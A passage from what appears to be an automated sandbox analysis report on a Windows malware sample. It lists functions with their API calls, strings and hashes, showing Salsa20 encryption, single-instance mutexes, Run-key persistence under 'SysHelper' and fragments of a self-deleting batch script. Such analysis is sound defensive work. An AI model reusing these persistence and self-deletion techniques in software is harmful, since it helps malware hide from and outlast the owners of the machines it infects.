                    • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                    Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                    • String ID:
                    • API String ID: 3232302685-0
                    • Opcode ID: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                    • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                    • Opcode Fuzzy Hash: 343a40c2320f36c0a67bd0d09e6816cdff555a949c20798249c71fe74911a55b
                    • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                    Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                    • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                    • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                    • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                    Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                    • input != nullptr && output != nullptr, xrefs: 0040C095
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wassert
                    • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                    • API String ID: 3993402318-1975116136
                    • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                    • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                    • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                    • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                    Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextDestroyHashRelease
                    • String ID:
                    • API String ID: 3989222877-0
                    • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                    • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                    • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                    • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                    Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextDestroyHashRelease
                    • String ID:
                    • API String ID: 3989222877-0
                    • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                    • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                    • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                    • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                    Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Crypt$ContextDestroyHashRelease
                    • String ID:
                    • API String ID: 3989222877-0
                    • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                    • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                    • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                    • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                    Function 004278D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                    • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                    • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                    • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                    Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                    • GetLastError.KERNEL32 ref: 00412509
                    • CloseHandle.KERNEL32 ref: 0041251C
                    • CloseHandle.KERNEL32 ref: 00412539
                    • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                    • GetLastError.KERNEL32 ref: 0041255B
                    • CloseHandle.KERNEL32 ref: 0041256E
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateErrorLastMutex
                    • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                    • API String ID: 2372642624-488272950
                    • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                    • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                    • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                    • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                    Function 00427B21 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32 ref: 00427B29
                    • _free.LIBCMT ref: 00427B42
                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                    • _free.LIBCMT ref: 00427B55
                    • _free.LIBCMT ref: 00427B73
                    • _free.LIBCMT ref: 00427B85
                    • _free.LIBCMT ref: 00427B96
                    • _free.LIBCMT ref: 00427BA1
                    • _free.LIBCMT ref: 00427BC5
                    • EncodePointer.KERNEL32(00775428), ref: 00427BCC
                    • _free.LIBCMT ref: 00427BE1
                    • _free.LIBCMT ref: 00427BF7
                    • _free.LIBCMT ref: 00427C1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                    • String ID: (Tw
                    • API String ID: 3064303923-3651777157
                    • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                    • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                    • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                    • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                    Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strncmp
                    • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                    • API String ID: 909875538-2733969777
                    • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                    • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                    • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                    • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                    Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                    • String ID:
                    • API String ID: 1503006713-0
                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                    • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                    Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                    Download Yara Rule
                    APIs
                    • PostQuitMessage.USER32(00000000), ref: 0041BB49
                    • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                    • _malloc.LIBCMT ref: 0041BBE4
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                    • _free.LIBCMT ref: 0041BCD7
                      • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                      • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                      • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                      • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                      • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                      • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                    • IsWindow.USER32(?), ref: 0041BF69
                    • DestroyWindow.USER32(?), ref: 0041BF7B
                    • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                    • String ID:
                    • API String ID: 3873257347-0
                    • Opcode ID: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                    • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                    • Opcode Fuzzy Hash: f729ec156da57fca7fee0a65632cfd00bd7f39968df2b9978418747e4f1c509a
                    • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                    Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00411BB0
                    • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                    • CoUninitialize.OLE32 ref: 00411BD0
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                    • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                    • lstrcatW.KERNEL32(?), ref: 00411C44
                    • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                    • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                    • String ID: \shell32.dll
                    • API String ID: 679253221-3783449302
                    • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                    • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                    • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                    • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                    Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                    • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                    • GetDesktopWindow.USER32 ref: 004549FB
                    • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                    • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                    • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                    • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                    • _wcsstr.LIBCMT ref: 00454A8A
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                    • String ID: Service-0x$_OPENSSL_isservice
                    • API String ID: 2112994598-1672312481
                    • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                    • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                    • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                    • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                    Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                    • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                    • __vfwprintf_p.LIBCMT ref: 00454B27
                      • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                    • vswprintf.LIBCMT ref: 00454B5D
                    • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                    • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                    • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                    • String ID: OPENSSL$OpenSSL: FATAL
                    • API String ID: 277090408-1348657634
                    • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                    • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                    • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                    • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                    Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                    • _memset.LIBCMT ref: 004123B6
                    • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                    • RegCloseKey.ADVAPI32(?), ref: 004123E7
                    • GetCommandLineW.KERNEL32 ref: 004123F4
                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                    • lstrcmpW.KERNEL32(?,?), ref: 00412422
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                    • SysHelper, xrefs: 004123D6
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                    • API String ID: 122392481-4165002228
                    • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                    • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                    • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                    • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                    Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memmove
                    • String ID: invalid string position$string too long
                    • API String ID: 4104443479-4289949731
                    • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                    • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                    • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                    • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                    Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040DAEB
                    • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                    • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                    • _memset.LIBCMT ref: 0040DC38
                    • CoUninitialize.OLE32 ref: 0040DC92
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
